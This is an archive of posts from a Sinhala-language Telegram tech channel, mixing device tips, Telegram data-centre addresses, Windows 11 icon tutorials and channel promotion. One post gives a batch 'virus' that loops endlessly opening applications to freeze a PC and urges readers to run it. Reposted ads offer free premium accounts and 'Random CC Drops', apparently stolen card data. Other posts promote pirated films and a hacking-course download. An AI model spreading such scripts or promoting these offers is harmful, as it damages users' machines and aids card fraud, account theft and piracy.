Razor Techᵀᴹ 🇱🇰
Open in Telegram
🌙 මානයෙන් එපිට වෙනමම මානයක් කරා 👁 Tech සම්බන්ධ වැදගත් Articles, Hacking ,Tips, Memes හැමදේම එකම තැනකින් 🌚🔥 Tutorials ද හොයන්නේ 🌝 ? 🌿Join :- @TutorialLK 🍃Join our community at @Razor_Tech 😌
Show more1 992
Subscribers
No data24 hours
-107 days
-4230 days
Posts Archive
1 992
ෆෙන්ස් Android 12 ඕනම Device එකකින් Experience කරමුද😎😎?
Android 12 කියන්නේ මේ වෙනකොට තියෙන හොදම Android OS එකක්. ඒ වගේම Android 13 වල Beta එකකුත් Release වෙලා තියෙනව බලාගන්න පුලුවන්. ඒකත් Experience කරන්න පුලුවන් විදිහක් ආපුගමන් මේ වගේ Post එකක් අරන් එනනම්.
හරි ෆෙන්ස් එහෙනම් අපි දැන් බලමු කොකොමද Android 12 Experience කරන්නෙ කියලා🥳🥳
📌ඔයාලට මුලින්ම කියන්න තියෙන්නෙ මේ Website එකට යන එක විතරයි.
📌දැන් ඔයාලට පුලුවන් ලේසියෙන්ම ඔයාලගේ Email Password දීලා මේකට Sing Up වෙන්න.
📌දැන් ඔයාලට එකේ Dashboard බලාගනන් පුලුවන් Realtimetesting කියලා එකක් ඒකට යන්න.
📌දැන් ඔයාලට කරන්න තියෙන්නේ එතන තියෙන APP Testing කියන එකට ගිහිල්ලා Google කියන Brand එක යටතෙ තියෙන Pixel 4A කියන Device එක Start කරන්න.
දැන් ඔයාලට පුලුවන් ෆෙන්ස් Android 12 Experience කරන්න.
10Min වලින් Ens උනොත් ආයි Start කරන්න හොදේ.😄😄
Credit:- @DevelopersSupporLk 😌🔥
1 992
Zero To Goad Hacking Course
1500+ Videos ✅
30GB ✅
File Will Delete Zoon !
Download Quick !
Download Link 👇
https://drive.google.com/file/d/1hjRS3wxjDbLxoYaKNAThM5ujSfTa8mWC/view?usp=sharing
Password 👇
Master5Hacker1 992
ගර්භනී කාන්තාවන් තම දරු ගැබට මාස හතක් වෙද්දී සකස් කරගත යුතු ඇඳුම් කට්ටලය සමඟ ඉන්ධන භූලියක්ද අමතරව සූදානම් කර ගන්නා ලෙස රජයේ පවුල් සෞඛ්‍ය සේවා නිලධාරීන්ගේ සංගමය ඉල්ලා සිටී. ඉන්ධන හිගය හේතුවෙන් ඇතැම් ගර්භණී කාන්තාවන්ට දරු ප්‍රසූතිය සඳහා රෝහල්ගත වීමට නොහැකි වීමේ තත්ත්වයක් මතුවී තිබීම මීට හේතුවයි. සංගමයේ සභාපතිනි දේවිකා කොඩිතුවක්කු මහත්මිය සඳහන් කරන්නේ ඉන්ධන බූලියක් ළඟ තබා ගැනීමෙන් කුමන හෝ වාහනයක් මගින් ගර්භනී කාන්තාවකට රෝහල් කරා යා හැකි වනු ඇති බවයි. දරු ප්‍රසූතියක් රෝහලක දී සිදු කිරීම අනිවාර්ය බවද ඇය අවධාරණය කර සිටින්නීය.
ම්ම්ම් යසයි 🙂1 992
ඉගෙනගන්ඩලු... රටේ අනාගතය අපිලු.... කොහොමද ඉගෙනගන්නෙ ඇහුවම.... කොහොමහරි ඉගෙනගන්ඩලු.....😑
#Think 💔
#GoHomeGota2022
1 992
🔴 ඔයා Marvel fan කෙනෙක් නම් අනිවාර්යයෙන් උඩ video clips ටික දැකලා ඇති ඒත් ඉතින් ඒවා films නිසා ඔයා ඒ scene ගැන වැඩිය හිතන්නේ නැතුව ඇති..😁
ඒත් ඒක ඇත්තටම කරන්න පුලුවන් දෙයක්නම්..👀
ඔව් ඒක ඇත්තටම කරන්න පුලුවන් දෙයක්... 😳 සරලව කිව්වොත් ඒ තමයි Astral Projection කියන එක...ඒ මොකක්ද ඒ....? 🤔 ඒක ගැන දන්නේ නැත්තම් අපි මුලින්ම දාපු article එක කියවලා බලන්න. 🙃
💬 දැන් ඔයා හිතනවා ඇති
"හරි ඉතින් ඒකෙන් අපිට ඇති වැඩේ මොකක්ද" කියලා...ඒත් අපිටත් astral projection කරන්න පුලුවන් කිව්වොත්...? 🤯
🤔 දැන් ඔයා අහයි "ඇත්තටම පුලුවන්ද..?" කියලා 😁
💬 ඔන්න ආයි ඔයගේ උනන්දුව පොඩ්ඩක් වැඩි වෙනවා මේක ගැන 👀..ඔයාටත් කරලා බලන්න ආසාවක් එනවා...ආ නැද්ද මං අහන්නේ...?🌝 ඒත් ආයි ඔන්න ඔයාගේ උනන්දුව down වෙනවා😶🌫️ "මේක කරන්න ලොකු ලොකු අමාරු ක්‍රම, භාවනා ක්‍රම ඕනවෙයි" කියලා.එහෙම කිසි දෙයක් උවමනා වෙන්නේ නෑ 😇 ඔයාට ඕනේ කරන්නේ ඔයා ගැන විශ්වාසය විතරයි.😌
එන්න අපි ලේසිම step එකෙන් පටන්ගමු එහෙනම්. 😌👇1 992
මොනවද මේ Telegram Data Centers කියන්නේ ? 🌿
💭 මෙහෙමයි...Telegram use කරන ඔයාගෙ මගෙ ඔක්කොම විස්තර තියෙන්නෙ Telegram Data Centers වල 🌝.Account වල විස්තර bot ලගෙ විස්තර API Keys එහෙම ඔක්කොම මේවායෙ තමා තියෙන්නෙ..🙂
💭 අපි telegram එකේ මැසේජ් කරද්දි කෝල් ගනිද්දි එහෙම මේ DC හරහා තමා යන්නෙ එතකොට අපිව ලගම තියෙන DC එකට තමයි connect වෙන්නෙ 👀❤️.මේ වගේ Data Centers 5ක් තියෙනව ලෝකෙ පුරා 😗.මේවා හැම එකකම IPv4, IPv6 ends තියෙනව 🌝
ඔය මන් පල්ලෙහා දාල තියෙන්නෙ DC ටිකයි ඒවායෙ Ip address ටිකයි..👇👇👇
🔴 DC 1
Location :
MIA, Miami FL, USA
IPv4 : 149.154.175.53
IPv6 : 2001:b28:f23d:f001::a
🔴 DC 2
Location : AMS, Amsterdam, NL
IPv4 : 149.154.167.51
IPv6 : 2001:67c:4e8:f002::a
🔴 DC 3
Location : MIA, Miami FL, USA
IPv4 : 149.154.175.100
IPv6 : 2001:b28:f23d:f003::a
🔴 DC 4
Location : AMS, Amsterdam, NL
IPv4 : 149.154.167.91
IPv6 : 2001:67c:4e8:f004::a
🔴 DC 5
Location : SIN, Singapore, SG
IPv4 : 91.108.56.130
IPv6 : 2001:b28:f23f:f005::a
ඉතින් ඕව හරහා තමයි අපි Telegram එකට connect වෙන්නෙ 😁
ලංකාව ඉන්දියාව වගේ දකුණු ආසියානු රටවල් වලට ලගම තියෙන Data Center එක තමා Singapore එක ඒක හරහා තමයි අපේ Account Register වෙලා තියෙන්නෙ 🙂..
ඔය US account පාවිච්චි කරන මහත්තුරුන්ගෙ ඒවනන් Singapore නෙවෙ ඔම්න 🥲. ඒව Register වෙන්නෙ DC 1. ඒ කියන්නෙ USA DC එකට 😁.
තව කියනවනන් ගොඩක් දේවල් තියෙනව ඉතිම් මේ ගැන 🥲 ඒත් ඉතින් මේක දික් වෙනවනෙ ඒක හින්ද මෙතනින් නවත්තන්නන්. 🥲 වැඩි දුර විස්තර මන් පල්ලෙහා දාල තියෙන ලින්ක් එකෙම් ගිහිම් බලම්න 🙂
👉 Click Here for Additional Info 👈
React එකක් Comment එකක් දාගෙන යම්න මේ මගෙ පළවෙනි පෝස්ට් එක @RazorTech එකට දාන ♥️ හොදද කියලත් කියම්න 😁
Good Bye Prens 📱
මන් Kaveesha 🥲1 992
Pc එක හිරවෙන Virus එකක් සාදා අත්හදා බැලුවෙමි.😌
ඉතින් මේ Virus කලින් වගේ එවා නෙමෙයි සිරියස් කේස් එකක් 🥲
මේකෙන් මොනවාද වෙම්නේ 👀
ඔයාගේ Pc එකේ තියෙන Cmd, Notepad, Paint වගේ එවා එකදිගට On වෙනවා. එතකොට Pc එකේ Ram,Cpu එකෙන් උපරිම Usage ගිහිල්ලා හිරවෙනවා. දැන් ප්‍රශ්නයක් ඇති මේක Run කලොත් Pc එකට කෙලවෙයිද කියලා, ඉතින් කෙලවෙන්නත් පුලුවන් නැති වෙන්නත් පුලුවන්. එත් මම නම් Recommend කරන්නේ තමන්ගේ Pc එකේ Run කරන්න කියලා.
මෙන්න Code එක😟
@echo off // It instructs to hide the commands when batch files is executed :x //loop variable start winword start mspaint //open paint start notepad start write start cmd //open command prompt start explorer start control start calc // open calculator goto x // infinite loopකලින් Virus වගේ Bat එකක් විදියට Save කරන්න. මේ පොජ්ජ තමා තමයි මට මට්ටු කරන්න තියෙන්නේ 😐 හි හි පුරස්න තියෙනවද : @Methuka_S @Methuka </>😌❤️
1 992
Repost from 𝑅𝑎𝑤𝑎𝑛𝑎 𝐷𝑒𝑣𝑒𝑙𝑜𝑝𝑒𝑟'𝑠 | ∞™
🌟Rawana Developers Official Website Comming soon
Site Developer & Video Editor - Pulindu Sashmitha
Founder - Saviya
🌷YouTube - Subscribe🌷
🌷Tiktok - Follow🌷
🌷Telegram🌷
1 992
🌺 දහසක් මල් විකසිත වෙන මේ හිමිදිරි උදෑසනේ මා ඔබලා ඇමතීමට ආවේ ඔයා කැමති ඕනිම සින්දුවක් High Quality Mp3 එකක් විදියට ඔයාගේ Device එකට Download කරලා Mp3 Player එකකට දාගෙන අහන විදිය ගැන කතා කිරීමටයි ✅
💬 ඇත්තටම කිව්වොත් මේක අපේ අංජන කොලුවගේ වැඩක් 😁.අපිට Bot කෙනෙක් හදන්න තිබ්බා මේ වැඩේට 😇.ඒත් හැදුවෙ නැත්තේ Bot කෙනෙක් හිටියොත් ඔයාලා ඒක හරහා සින්දු Download කරලා ඒ Download කරපු සින්දු වෙන තැන්වල Publish කරයි කියලා තියෙන සැකේ හින්දා 💔
💬 කෝම හරි සින්දු Download කරගත්තනම් ඒක ඔයාගේ Device එකේ විතරක් තියාගෙන අහන්න Publishing වගේ දේවල් වලට යන්න එපා කියලා අපි ඉල්ලනවා 🌝❤️
💬 ඇත්තටම මේ Website එකෙන් වෙන්නේ ඔයා සින්දුවක නමක් Search Bar එකේ ගහපුවාම ඒ සින්දුව Deezer Database එකේ Search වෙලා අදාළ සින්දුව හම්බ උනොත් ඒ සින්දුව Website එක හරහා හෝ ඔයාගේ Device එකට Mp3 එකක් විදියට දෙන එක 😉
🌀 උදාහරණයක් විදියට ගත්තොත් : ඔයාට Faded කියන සින්දුව ඕනි කියන්න 💐.ඉතින් දැන් අපි බලමු ඒක Download කරගන්නේ කොහොමද කියලා 🌚
🟢 01. මුලින්ම ඔයාට කරන්න තියෙන්නේ අපේ Website එකට යන එක.
🟢 02. ඊටපස්සේ කැමති සින්දුවක නමක් Type කරලා Search කියන Button එක Click කරන්න.ඉතින් මම Faded කියලා Type කරලා Search Button එක Click කරනවා දැන්
🟢 03. දැන් ඔයා Search කරපු දෙයට ගොඩක්ම අදාළ වෙන Result එක එයි.ඉතින් ඔයාට කරන්න තියෙන්නේ හරි සින්දුව තෝරගෙන Download Button එක Click කරලා Device එකට Download කරගන්න එක
🟢 04. දැන් ඒ Download කරගත්තු එක PowerAmp වගේ Music Player වගේ App එකක් හරහා හෝ Pen Drive එකකට දාගෙන Player එකකින් අහන්න
වැඩේ ඉවරයි ඉතින් මේක ඔයාට ගොඩක් වැදගත් වෙයි කියලා හිතෙනවා 😁❤️
ඒ වගේම ඔයා Website එක හරහා Search කරද්දි Type කරන එක හරියට Type කරන්න මොකද ඒ තරම් Word Sensitive 🙈
⚫️ Website Link : https://dz.anjanamadu.net/
🔴 Credits for Website : Anjana from @Harp_Tech ❤️
Post from @RazorTech 🇱🇰
1 992
ⱮąxƬɾíxゞ™Ɠíⱱҽąωąყʂ 🇱🇰
You can get premium Accounts For free in our Channel.
ex:- p*rnHub premium, Spotify, Netflix
✅ Daily Giveaways.
💬 You can Request Accounts.
💳 Random CC Drops.
☁️ VPN Files.
🧪Udemy Courses.
ALSO YOU CAN BECOME AS AN ADMIN IN OUR CHANNEL.
☘️So Click Join Button & Join with us. Thank You.
ⱮąxƬɾíxゞ™Ɠíⱱҽąωąყʂ 🇱🇰
1 992
Repost from 🇺🇦 FZ BOTS 🇱🇰
Google Enterprise Shared Drives Available from 1$
If You are looking for shared drives
Drop a comment
Pricing
1$ - 2TB Storage
3$ - Unlimited Storage (100TB Recommended)
Drives comes from Google Workspace Enterprise plan
#NOTEDU
Free Shared Drives Generated from Schools Will Be Deleted Soon because of google new policy
1 992
Tutorial ✅
මම කිව්වනේ Windows 11 වල ලස්සන UI එකක් එහෙම තියේ කියලා 😇.ඉතින් මට මතක් උන දෙයක් තමයි Windows 11 වල Icons Windows 10 වලටත් Install කරගන්න තිබ්බනම් කියලා 😉🙈.මට හම්බුනා එක්තරා විදියක් 😌.ඉතින් අද ගෙනාවේ ඒක ගැන 😗.
💬 Step 01. මම පල්ලෙහා දීලා ඇති zip file එකක්.ඒක මුලින්ම Extract කරගන්න ✅.Extract කරගත්තට පස්සේ ඒක ඇතුලේ ඇති Windows 11 Icons by Razor Tech කියලා Application එකක් ⚫️.ඒක Run කරගන්න ✅.
💬 Step 02. ඊට පස්සේ පල්ලෙහා Checkbox එකට Tick එක දාලා Next කරන්න 🌝..ඊලඟට Patch all the files තෝරලා next දෙන්න 😁
💬 Step 03. Restore Point එකක් හදන්න අහනවා මොකක්ම හො වැරැද්දක් උනොත් PC එක තිබ්බා වගේම Restore කරගන්න 😒.ඒකට කැමතිනම් Yes දෙන්න නැත්නම් No දෙන්න ☺️.මමනම් No දෙන්නේ ඕකට 😅
💬 Step 04. දැන් අපේ Icon Pack එක Install වෙන ගමන් තියෙන්නේ 😗.මේකට විනාඩි 4 - 5 ක් වගේ යයි 😇.Install වෙලා ඉවර උනාම ඔයාට බලාගන්න පුළුවන් අපේ කැතම කැත Windows 10 Icons අයින් වෙලා Windows 11 Icons Install වෙලා කියලා 😜.
💬 Step 05. මම දීලා ඇති "disable folder thumbs" කියලා Registry file එකක්.ඒක උඩත් ක්ලික් කරලා ඕපන් කරගෙන Add කරගන්න ✅.
දැන් වැඩේ හරි.Enjoy 🌀
🔴 මොනාම හරි අවුලක් ආවොතින් Comment එකක් දාන්න 🔴
මම @Ravindu_Deshan 🇱🇰
🔰 Download Required files : Click Here 🔰
1 992
අයුබෝවේවා යාළුවනේ 😗
🔴 ඔන්න මම ආත්ම ගානකින් Post එකක් ගෙනාවා 😌❤️.මේක ගොඩක් අය අහපු දෙයක් හින්දා මට ඒක ගැන ගේන්න හිතුනා 😁
🌀 Introduction : ඔයා කොහෙදි හරි අහලා තියේද ගෑණු ළමයෙක්ගේ ලස්සන බලලා නෙවේ,එයාගේ හදවතට ලංවෙලා...See more කරලා එයාව තේරුම් ගන්න ඕනි කියලා 😅
ඒත් කොල්ලෙක් කැතනම් ඌ කැතයිම තමා 😪.අන්න ඒ වගේ මේ සීන් එකත් 😌.පිටත රූපයට වශී වෙලා හිටියට ඇතුළතින් මෙලෝ රහක් නෑනේ 🤢.අපේ අංජන කොලුවට අනුව රූපෙට රැවටිලා අම්මටසිරිකරගන්න අය තමා වැඩි 😪😹
මොන මගුලක්ද යකෝ මූ කියන්නේ ? 🥲
🟢 Windows 11 එක ආදේශ කරගන්න මම කලින් කියපු ගෑණු ළමයාට 😗.Windows 10 ආදේශ කරගන්න සමස්ථ කොල්ලන්ටම 😌
Windows 11 ගිය අවුරුද්දේ අග භාගයේදි වගේ release උනානේ ✅.ඉතින් පට්ටම ලස්සන UI එකක් තමයි තියෙන්නේ.කියලා වැඩක් නෑ MacOS වල ගති ලක්ෂණ + Android වල ගතිලක්ෂණ ඔක්කොම එකතු වෙලා තමා මේක හැදිලා තියෙන්නේ 🌝.ඔයා Windows 11 Experience කරලා තියේනම් දන්නවා තාම Performance වලට හරියට Optimization කරලා නැහැ කියලා 💔.එකම PC එකේ Windows 10 වලින් මොකක්ම හෝ Game එකක් ගහද්දි ඒ Game එකේ Framerate (FPS) එක 60/60 ම යද්දි Windows 11 වල ගියේ 45 - 60 ත් අතර.😗
ඉතින් මට අනුවනම් Performance එක අතින් Windows 10 මෙහෙයුම් පද්ධතිය ඉස්සරහින් සහ Appearance එක අතින් Windows 11 මෙහෙයුම් පද්ධතිය ඉස්සරහින් ඉන්නවා 🟡.සමහරවිට ඔයාට මේක සම්පූර්ණයෙන්ම කණපිට වෙන්න පුළුවන් ඒක Device එකෙන් Device එකට වෙනස් වෙනවා ඉතින් 😇.
1 992
හැමෝම මේකට Join වෙන්න මොකද කවුරුවත් දන්නෙ නැති,දෙන්නෙ නැති ජාතියේ Tutorial Posts වගයක් හදලා තියෙනවා 🌝💖
හිමීට දාන්නම් 😌
😉 Teasers :
01.ක්ලාස් වල Apps වල ස්ක්‍රීන්ෂොට්,ස්ක්‍රීන් රෙකෝඩ් කරන්න බැහැ නේද..ඒවා කරන විදිය ඕනිද 😅 ?
02. Pen Drive එකක Size එක වැඩි කරගන්න එක ගැන අහලා තියේද 🌚
ඔය දෙක තමා ඊලඟට දාන්නේ වීඩියෝ ටික ready 💖
Join Now 🌿 :- @TutorialLK ✅
Owner - RD 🇱🇰
1 992
Repost from Tutorial LKᵀᴹ 🇱🇰
🔴 මොකක්ද මේ USB Drive Encryption with Password Protecting කියන්නේ ? 💬
සාමාන්‍යයෙන් ඔයා English films බලන කෙනෙක්නම් දැකලත් ඇති මේක 😁.ඒ කියන්නේ Pen Drive එකක් Computer එකට ගහනවා,ගැහුවට පස්සේ කියනවා මේ Pen Drive එක ඇතුලෙ තියෙන දේවල් බලන්නනම් පාස්වඩ් එකක් ගහන්න කියලා 😌
⚠️ මේ වීඩියෝ එක බලලා ඉන්න අනිවාර්යයෙන් මම මේ කියන්නේ මොකක්ද කියලා Idea එකක් ගන්න ✅
🟢 මේ වීඩියෝ එකේ සම්පූර්ණ විස්තරය තේරෙන සිංහලෙන් බලන්න : Click Here
අපේ @TutorialLK ටෙලිග්‍රෑම් චැනල් එකේ පළවෙනි පෝස්ට් එක ⚫️
මේ වගේ කවුරුත් ආස කරන Premium Tutorial Videos සහ Articles නම් ඉතින් @TutorialLK අපෙන් විතරයි ✅
🔴 මේකේ ඉන්න හැමෝම මේකට Join වෙන්න මොකද Powered by @RazorTech 🇱🇰
1 992
මම @Ravindu_Deshan ⚫️..මම Admin ඉන්නවා Science Facts channel එකේ 💬 ඇත්තටම කිව්වොත් මම දැකපු සුපිරිම Science Channel එක කිව්වොත් නිවැරදී ✅.
ඉතින් චැනල් එකක් තනියෙන් කරන්න බැහැනේ කෙනෙක්ට 😇.අපි Admins ලා ගන්නවා ❤️.ඉතින් මෙහෙම චැනල් එකට Admin කෙනෙක් අරගෙන අලුතෙන්.පොර ඇඩ්මින් ආපු හැටියෙම කරලා තියෙන්නේ චැනල් එකේ තිබ්බ Posts 150 ක් විතර ඩිලිට් කරපු එක 🙂
🔴 මට ඔයාලගෙන් උදව්වක් ඕනි මෙන්න මුට Gban ගහන්න කිසිම Group / Channel එකකටවත් Join වෙන්න බැරි වෙන්න 🔴
දැන් අනිවා ඌ මේ Post එක දැකලා නම ගම වෙනස් කරගනී 😅.වැඩක් නෑ අපිට ඔයාගේ Account එකට Direct Access තියේ හොයාගන්න පුළුවන් විදියට 😗.
🔴එයාගේ Telegram ID එක Gban පාරක් ඕනිමයි :
5456916364
🔴 එයාගේ Telegram Account එකට Directly යන විදිය : Click Here
💬 ඔයාලටත් කියන්න තියෙන්නේ ඔයාලා Channel,Groups කරනවනම්;අලුත් Admins ලා ගන්නවනම් පොඩ්ඩක් හොයලා බලලා ගන්න නැත්නම් ගන්නම එපා.ඔයාට විශ්වාසවන්තම යාළුවන්ට දෙන්න නැතිනම් 👍🏻.
අලුත් Admin ලා ගන්නම ඕනිනම් ගන්න ඒත් Permissions උපරිම අඩු කරන්න එයාගේ ⚠️..ටික කාලයක් යද්දි ඔයාගේ විශ්වාසය හැදුනනම් එයා ගැන > ඔයාට පුළුවන් මෙයාගේ Permissions ගැන හිතන්න ☺️
අද හවසට සුපිරිම Post එකක් දානවා කවුරුවත් නොකරපු විදියට මගෙම කටහඬින් තේරෙන සිංහලෙන් Video එකක්.React පාරක් දාන් යන්න
Gban නම් ඕනිමයි ආ UserBots ලා තියෙන අය ✅1 992
හෙලෝ මයි ඩියර් පෙන්ඩ්ස් ▁▂▃▄█▒▓▓▓▓▓▓▓▓
ලෙවකන්නවත් තෙල් කදුලක් නැති මේ වෙලාවෙ ඔබ හමුවුනේ මම ගැන කියන්න
ඉස්සරවෙලාම කියන්න ඕන මම නම් ක්ක්ක්ක් ගාන රේන්ද හිකනලෙක් නෙවේ 😎
මගේ නම් අදීප ඉතින් මම මේ සෙට් එකත් එක්ක එකතු උනෙ එක්තරා අමුතු කණ්ඩායමක් විසින් කාබසිනියම් කරන ලද Ranindu ගෙ Music channel එකේ Admin කෙනෙක් වශයෙන් .
ඉතින් මුලින්ම කියන්න ඕන මම දන්නෙ නැති දේවල් ගොඩක් තියනවා ඒ මොනාද කියන්න මම දන්නෙ නෑ 🥲
මමත් දන්න දේවල් පොඩ්ඩක් තියනවා ඒවා ඔයාලට කියල දෙන්න මම බලාපොරොත්තු වෙනවා පුලුවන් ඉක්මනට වෙලාව නම් නෑ හැබැයි 😕
උපරිමෙම්ම කරනවා අපේ සෙට් එකේ හැම එකෙක් ම එහෙමයි ❤️🥺
ඉතින් දිගටම ඉන්න
React ඕන ......❤️🙂
1 992
හලෝ හලෝ හලෝ මගේ ප්ලැටිනම් දියමන්ති යාලුවනේ.. ලා හිරු කිරණ පොළව සිපගන්නා මේ හිමිදිරි උදෑසන පතන්නෙමි මා ඔබට සුබ දහවලක් කියා කුකුළවත් කරේ තියාගෙන තකහනියක් ඔයාලව හම්බ වෙන්න ආවෙ.. හෑ මොන මගුලක්ද මම ඒ කිව්වෙ🤔 කමක් නෑ.. ඔන්න අද මම ආවෙ පොඩි දෙයක් ගැන කියන්න.. අපි FilmsZilla Web එක කියලා මේ විසිට් කොරන හැමෝම දන්න විත්තියක් නොවැ.. ඉතින් අපේ මේ ෆිලුම්සිලා සයිට් එක අලුත් වෙලයි තියෙන්නෙ.. දැන් ඉතින් අහන්නෙපා ඇයි බං ටයිල් කරලා තීන්ත ගෑවද කියල. ඇයි හත්තික්කෙ එහෙම බාණ්ඩ ඉන්නෙ මේකෙ😂 එනිවේ ඒක ජෝක් එකක් ඈ.. ඉතින් අපේ FilmsZilla Web එකෙන් අපි ඉස්සර දුන්න හැම ෆිල්ම් Quality එකක්ම, ඒ කියන්නෙ 1080P X264, 1080P X265, 720P X264, 720P X265, 720P & 1080P PSA Copies වගේම 4K Rips ඇතුලුව හැම Quality එකෙන්ම දැනටමත්ම හැම Film එකම Upload කරනවා.. ඒ වගේම තමයි මේ හැම එකකම Download Delay එකක් නෑ මොකද කිව්වොත්, ටඩා... අපි High Speed Servers තමයි දාලා තියෙන්නෙ.. ඒ නිසා ඩවුන්ලෝඩ් වීම ගැන කිසිම ප්‍රශ්නයක් තියාගන්න එපා.. ඊළඟ එක තමයි, අපෙන් ගන්න හැම ෆිල්ම් එකකම TV Series එකකම Subtitle එකත් ඔයාලට ගන්න පුලුවන් වටේ යන්නෙ නැතුව.. ඒ වගේම තමයි ඔයාලට අවශ්‍ය Movie එකක් තියෙනවනං ඔයාලට පුලුවන් ඒ ෆිල්ම් එක Request කරලා අපෙන් ඉල්ලගන්න.. ඉතින් මේක වටින්නැද්ද මගේ ගෝටාබයරාජපස්සපුරවාසීනී? ඕකේ ඕකේ ජෝක් ඉනෆ්.. ඉතින් අන්තිමටම කියන්න තියෙන්නෙ, දැනට Internet එකේ Leading ම සහ Best ම Movie Site එක වෙන FilmsZilla Community එකත් එක්ක මෙච්චර කල් රැඳුණ අයට ස්තූති කරන ගමන්, ඉස්සරහට අපිත් එක්ක එකතුවෙන්න ඉන්න අයටත් ආරාධනා කරනවා, Capa One Nam Join Wenna😉❤️
